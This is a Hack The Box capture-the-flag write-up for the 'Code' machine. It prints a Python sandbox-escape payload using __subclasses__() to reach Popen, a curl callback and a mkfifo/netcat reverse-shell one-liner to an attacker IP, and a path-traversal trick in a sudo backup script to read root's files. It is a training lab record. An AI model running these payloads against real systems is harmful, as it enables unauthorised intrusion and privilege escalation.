Code

EasyMachineJul 19, 2025

#Reconnaissance#Vulnerabilities#discover-arbitrary-execution#sqlite

Arrexel

Planning

Scope

The scope of this engagement involved a simulated Black Box penetration test against a single target virtual machine hosted on the Hack The Box platform, identified as:

[Code::IP HERE]

The assessment focused on identifying vulnerabilities and achieving privilege escalation to gain both user and root access within the confines of the designated virtual environment. Activities were strictly limited to the specified machine, adhering to Hack The Box's ethical hacking guidelines and the principles of responsible disclosure

Strategy

We will follow the plan laid out in our HTB Methodology

We'll begin reconnaissance by making our way through HTB Methodology#1 - Port Scan discovering any potential footholds we can later explore.

Foothold(s) identified

The list of potential footholds below were identified during our CodeReconnaissance that we're explored. Provided next to each item is the time planned, and the acutal time spent on each foothold. The items also are identified to whether or not the assisted in the vulnerabilities found in Vulnerabilities

Potential Vulnerability	Time Estimated	Time Spent	Verified

Reconnaissance

Initial port scan

nmap/code.nmap

Python editor

Looks like we have some restrictions on our webIDE Pasted image 20250719160512.png

Gunicorn 20.0.4 vulnerability

https://huntr.com/bounties/22158e34-cfd5-41ad-97e0-a780773d96c1

Discover Arbitrary Execution - Python

After some trial and error we saw we had the Popen class, and can run commands against it

test = ''.__class__.__base__.__subclasses__()[317](['curl','10.10.14.245:9003'])
print(test)

Pasted image 20250719172321.png

https://book.hacktricks.wiki/en/generic-methodologies-and-resources/python/bypass-python-sandboxes/index.html?highlight=python%20__class))discover-arbitrary-execution

shell= 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.245 9000 >/tmp/f'
test = ''.__class__.__base__.__subclasses__()[317](shell, shell=True)
print(test)

Pasted image 20250719172759.png

Vulnerabilities

Vulnerabilitiy	CVE	Recommended Patch
[Snyk - Gunicorn 20.0.4](https://security.snyk.io/package/pip/gunicorn/20.0.4)	CVE-2024-1135

Getting the User Flag

Becoming Root

sqlite Database

Pasted image 20250719175213.png

Pasted image 20250719175019.png

then we swap to martin and have sudo access to /usr/bin/backy.sh

we see that we can provide a json with a list of destinations, and with some tweaking

/home/....//root/

gives us the root.txt!

Precious Manager